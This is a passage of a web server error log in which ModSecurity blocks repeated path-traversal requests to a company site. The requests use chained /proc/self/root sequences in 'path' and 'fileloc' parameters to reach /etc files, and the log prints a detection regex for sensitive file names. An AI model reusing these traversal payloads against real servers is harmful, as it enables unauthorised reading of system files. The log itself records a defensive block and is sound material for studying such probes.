"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0dVzJ3M9BSuKP7CAYPyQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:12:06.759463 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.243.128:33162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ddvXLqtnMIWvjpaKQIgAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:12:25.185984 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:48812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0diBCii7xarUs8iHZdvgAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:12:46.597790 2026] [mime_magic:error] [pid 9818:tid 140411599251200] (70014)End of file found: [client 57.141.18.60:60600] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:13:20.846622 2026] [mime_magic:error] [pid 7235:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:63454] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:13:21.550882 2026] [:error] [pid 15826:tid 140411590858496] [client 216.73.216.191:26613] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0dweoXxyEfFpUF8f93nQAAAVI"]
[Fri Mar 20 07:13:22.969774 2026] [mime_magic:error] [pid 7235:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:6237] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:13:24.079498 2026] [:error] [pid 10189:tid 140411607643904] [client 216.73.216.191:3293] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0dxDJ3M9BSuKP7CAYQXwAAAJA"]
[Fri Mar 20 07:13:27.622062 2026] [mime_magic:error] [pid 9818:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:6348] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:13:31.565325 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:48472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0dy_XLqtnMIWvjpaKQnwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:13:32.914009 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.243.128:50874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0dzPXLqtnMIWvjpaKQoQAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:13:51.171543 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:50880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d3_HIg5MgXLBnicPu5QAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:00.163532 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:40140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d6DJ3M9BSuKP7CAYQlgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:01.427635 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:38952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d6RCii7xarUs8iHZeKwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:02.830072 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:38954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d6ta6ubjKNq_cu4bKPQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:04.101195 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:38962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d7BCii7xarUs8iHZeLwAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:06.416110 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:38970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d7jJ3M9BSuKP7CAYQogAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:07.745090 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:38974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d7xCii7xarUs8iHZeMgAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:09.099016 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:38984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d8RCii7xarUs8iHZeNgAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:11.084331 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:55036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d8l1pVZ5mVmJwsFMlxAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:13.023294 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:55046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d9fXLqtnMIWvjpaKQuQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:14.395923 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.243.128:55052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d9l1pVZ5mVmJwsFMlzQAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:15.877918 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:55066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d99a6ubjKNq_cu4bKRgAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:18.759031 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:55072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d-vXLqtnMIWvjpaKQwgAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:20.127683 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.243.128:37870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d_F1pVZ5mVmJwsFMl2QAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:21.559476 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:37880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d_da6ubjKNq_cu4bKTAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
